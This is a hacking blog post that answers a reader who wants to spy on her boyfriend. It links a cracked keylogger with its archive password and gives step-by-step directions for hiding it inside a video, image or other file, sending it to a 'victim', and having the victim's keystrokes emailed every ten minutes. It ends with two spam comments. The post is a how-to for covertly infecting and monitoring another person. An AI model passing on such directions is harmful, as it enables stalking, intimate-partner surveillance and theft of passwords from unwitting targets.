Share

Hack All Accounts With Keylogger




Hello!
         Today on our facebook fan page a girl requested me to give her a keylogger that works. She said

                  "Hi, Can you please give me a Keylogger and tell me how to send it to someone?
                   I wanna know if my boyfriend is cheating me? Please help me. I searched a lot
                   about it, but all the keyloggers I found on the other sites were not working. Please
                   give me a Keylogger that works. Thanks!"


Lol! she needs a keylogger just to know what her boyfriend is doing. :)
OK now lets come to the point. I already have posted about it in Chapter 9 : Hack into Someone's PC using Keylogger but right now I'm posting full and latest version of keylogger.
Download the keylogger by clicking HERE.
The password is wannahackit.blogspot.com
It's already registered you don't need to do anything to register it.

Send Keylogger To The Victim:
                                                                    After downloading and installing keylogger to your PC, you'll see a little notepad icon in your system tray, right click on it and click on Remote Installation a file will open, click on Next, if you wanna append keylogger with a video, image, audio or with any file, check on append keylogger engine to file or another application then click on browse and select the file you wanna append keylogger with and click Next four times. Now check on send logs every and set the time 10 minutes and click Next now write the email address on which you wanna receive logs then write its password and click Next four times. Now select the destination, click Next then click Finish and you are Done!





3 comments:

  1. Amazing blog and very interesting stuff you got here! I definitely learned a lot from reading through some of your earlier posts as well and decided to drop a
    comment on this one!

    ReplyDelete
  2. I really appreciate your professional approach. These are pieces of very useful information that will be of great use for me in future.

    ReplyDelete